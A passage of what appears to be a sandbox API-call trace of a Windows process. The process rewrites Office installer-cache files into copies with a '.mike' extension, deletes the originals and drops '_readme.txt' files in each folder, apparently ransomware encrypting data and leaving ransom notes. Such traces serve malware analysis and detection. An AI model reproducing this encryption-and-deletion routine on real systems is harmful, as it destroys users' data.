lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.628] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0040.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.629] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.629] GetFileType (hFile=0x264) returned 0x1 [0040.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.629] GetFileType (hFile=0x264) returned 0x1 [0040.629] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.629] WriteFile (in: hFile=0x264, lpBuffer=0x2147d04*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2147d04*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.630] CloseHandle (hObject=0x264) returned 1 [0040.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.630] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21477ec | out: lpFileInformation=0x21477ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f)) returned 1 [0040.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.630] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.630] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.630] GetFileType (hFile=0x264) returned 0x1 [0040.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.630] GetFileType (hFile=0x264) returned 0x1 [0040.630] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.631] ReadFile (in: hFile=0x264, lpBuffer=0x2148e38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2148e38*, lpNumberOfBytesRead=0x2af110*=0x251f, lpOverlapped=0x0) returned 1 [0040.632] CloseHandle (hObject=0x264) returned 1 [0040.633] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0040.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.633] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.633] GetFileType (hFile=0x264) returned 0x1 [0040.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.633] GetFileType (hFile=0x264) returned 0x1 [0040.633] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.633] WriteFile (in: hFile=0x264, lpBuffer=0x215752c*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x215752c*, lpNumberOfBytesWritten=0x2af124*=0x2520, lpOverlapped=0x0) returned 1 [0040.633] CloseHandle (hObject=0x264) returned 1 [0040.634] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0040.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.634] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.634] GetFileType (hFile=0x264) returned 0x1 [0040.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.634] GetFileType (hFile=0x264) returned 0x1 [0040.635] WriteFile (in: hFile=0x264, lpBuffer=0x215bdbc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x215bdbc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.635] CloseHandle (hObject=0x264) returned 1 [0040.636] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.636] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0040.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.636] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe26c1c80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe26c1c80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe26c1c80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2740)) returned 1 [0040.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.636] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.637] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0040.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.637] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x215d560 | out: lpFileInformation=0x215d560*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe26c1c80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe26c1c80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe26c1c80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2740)) returned 1 [0040.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.637] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.637] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", dwFileAttributes=0x80) returned 1 [0040.637] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.637] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1 [0040.638] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.638] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.638] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.638] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.638] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.639] GetFileType (hFile=0x264) returned 0x1 [0040.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.639] GetFileType (hFile=0x264) returned 0x1 [0040.639] WriteFile (in: hFile=0x264, lpBuffer=0x215f264*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x215f264*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.646] CloseHandle (hObject=0x264) returned 1 [0040.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.647] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.647] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.647] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe26c1c80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe26c1c80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.647] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe26c1c80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe26c1c80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.647] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2629700, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2629700, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe269bb20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1a90, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.647] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0040.648] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0040.648] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe26c1c80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe26c1c80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe26c1c80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2740, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.xml.mike", cAlternateFileName="VISIOM~1.MIK")) returned 1 [0040.648] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe269bb20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe269bb20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe26e7de0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.648] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe269bb20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe269bb20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe26e7de0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.648] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.648] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.648] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.648] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.649] CoTaskMemFree (pv=0x4fe370) [0040.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.649] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.649] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.649] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.649] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.704] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.704] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0040.704] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0040.704] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0040.704] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.704] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.704] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.705] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", lpFilePart=0x0) returned 0x4d [0040.705] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: 